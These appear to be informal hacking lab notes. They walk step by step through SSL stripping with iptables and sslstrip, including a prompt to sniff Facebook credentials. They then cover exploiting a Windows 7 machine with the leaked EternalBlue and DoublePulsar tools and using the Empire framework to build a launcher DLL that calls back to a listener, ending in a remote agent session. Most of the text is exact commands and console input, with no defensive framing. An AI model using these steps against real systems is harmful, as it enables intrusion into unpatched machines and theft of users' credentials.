eternal

1. SSL Striping
2. ------------
3. SSL -->> Secure Socket Layer --> To protect data by encrypting it.
4. Used in HTTPS
5. s --> Secure --> SSL
6.  
7. We use 3 commands to perform SSL Striping.
8. 1. we forward the ip address
9. $ more /proc/sys/net/ipv4/ip_forward
10. 0
11. $ echo 1 > /proc/sys/net/ipv4/ip_forward
12. $ more /proc/sys/net/ipv4/ip_forward
13. 1
14.  
15. 2. To forward and redirect the traffic via different port 8080
16. $ nano /etc/ettercap/etter.conf
17. LINUX
18. IPtables
19. iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport
20.  
21.  
22. $ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
23.  
24. 3. To start SSL Striping
25. $ ssltrip -l 8080
26.  
27. https://www.facebook.com
28. https
29. HSTS
30. ****Try sniffing facebook's cresentials using sslstrip2
31.  
32. Xerosploit
33. ----------
34. https://github.com/LionSec/xerosploit.git
35.  
36.  
37.  
38.  
39.  
40.  
41. Etternal Blue
42. -------------
43. EternalBlue Documentation
44. -------------------------
45. Download Python 2.6 from the link ----> https://www.python.org/download/releases/2.6/
46. After installing python you need to pass the path in environmental variables
47. "Right click" on "My Computer"
48. "Click" on "Properties"
49. Goto "Advanced" tab
50. "Click" on "Environmental Variables"
51. Under "System Variable" table ----> Under "Variable" column
52. Select "Path" and click on "edit"
53. Type the following
54. ;C:\python26\;C:\python26\scripts\;
55. click "OK"
56. click "OK"
57. click "OK"
58. Restart you computer
59.  
60.  
61. Download PyWin32 v2.12 from the link ----> Remember it will give you many version just download pywin32-212.win32-py2.6
62. https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
63. After installing it, restart your computer
64.  
65.  
66.  
67. Download a text editor which shows line number too.
68. Notepad++ --> https://notepad-plus-plus.org/download/
69.  
70. Download shadowbroker Project from the link ---> https://github.com/misterch0c/shadowbroker
71.  
72. Extract the shadowbroker project.
73. Copy it in C:\ drive.
74. Go to C:\shadowbroker\windows
75. 1. There will be a file fb.py
76. Open the file in a text editor.
77. Goto Line 72 and comment it by puting # in the starting of the 72th line
78. save the file and exit.
79.  
80. 2. There will be a file, Fuzzbunch.xml
81. Open that file too in a text editor
82. Goto line 19 ---> change the path to C:\shadowbroker\windows\Resources
83. Goto line 24 ---> change the path to C:\shadowbroker\windows\logs
84.  
85. Open command prompt and type
86. cd C:\
87. cd shadowbroker\windows
88. python fb.py
89.  
90. It will launch the shadowbroker python script
91. Default Target IP Address ---> IP Address of Windows 7 ------> hit enter
92. Default Callback IP Address ---> IP Address of windows xp -----> hit enter
93. Use Redirections ----> type "no" ------> hit enter
94. ---> hit enter
95. Project[0]:0 ---> select from the list-----> 0 to create a new project ---->hit enter
96. Give the project name hit enter
97. Type "yes" and hit enter
98.  
99. On the screen it will show
100. fb>
101.  
102. Now type the following
103. fb> use eternalblue -----> hit enter
104. type "yes" ---> hit enter
105. hit enter
106. hit enter
107. hit enter
108. hit enter
109. hit enter
110. hit enter
111. hit enter
112. type "1" ---> hit enter
113. type "1" ---> hit enter
114. hit enter
115. hit enter
116. hit enter
117. hit enter
118.  
119. It will start our eternalblue plugin and will ping backdoor in windows 7. After many many lines, it will show Eternalblue Succeeded.
120.  
121.  
122. Open Kali Linux machine
123. -----------------------
124. Download Empire project from the link -----> https://github.com/EmpireProject/Empire
125. Extract and copy Empire project on the desktop.
126.  
127. Open the terminal, type the following
128. cd Desktop
129. cd Empire
130. cd setup
131. chmod 777 install.sh
132. ./install.sh
133. this will install all the basic libraries for empire.
134. python setup-database.py
135. cd ..
136. chmod 777 empire
137. ./empire
138. It will start the empire project which will help us in setuping the listener and creating the DLL file for getting access in windows 7
139.  
140. It will show the following on the terminal
141. (Empire) >
142. (Empire) > listeners
143. (Empire: listeners) > uselistener http
144. (Empire: listeners/http) > set Name Eternal
145. (Empire: listeners/http) > set Host http://<kali linux IP Address>
146. (Empire: listeners/http) > set Port 8080
147. (Empire: listeners/http) > set execute
148.  
149. It will start listening on http://<kali IP Address>:8080
150.  
151. (Empire: listeners/http) > back
152. (Empire: listeners) > list
153.  
154.  
155. (Empire: listeners) > usestagers windows/dll Eternal
156. (Empire: windows/dll) > set Arch x64
157. (Empire: windows/dll) > execute
158. It will create a DLL file named as launcher.dll in /tmp/launcher.dll
159. Our kali linux machine will start listening for any reverse connection which will be execute by launcher.dll file on port 8080
160.  
161. Copy and paste launcher.dll file in windows xp
162.  
163. Go back to windows xp again, the same terminal which we left opened
164. fb Special (EternalBlue) > use Doublepulsar ---> hit enter
165. type "yes" ----> hit enter
166. hit enter
167. hit enter
168. type "0" ----> hit enter
169. type "1" ----> hit enter
170. type "2" ----> hit enter
171. complete path of launcher.dll file ----> hit enter
172. hit enter
173. hit enter
174. hit enter
175. hit enter
176. hit enter
177. type "yes" ----> hit enter
178. It will start executing launcher.dll in the windows 7 machine.
179. After many many lines it will show Doublepulsar Succeeded
180.  
181. Goto Kali linux machine, in the empire shell terminal, it will show
182. (Empire: windows/dll) > Initial agent ****** from <windows 7 IP> now active
183. (Empire: windows/dll) > agents
184. (Empire: agents) > interact <agent name>
185. (Empire: <agent name>) > sysinfo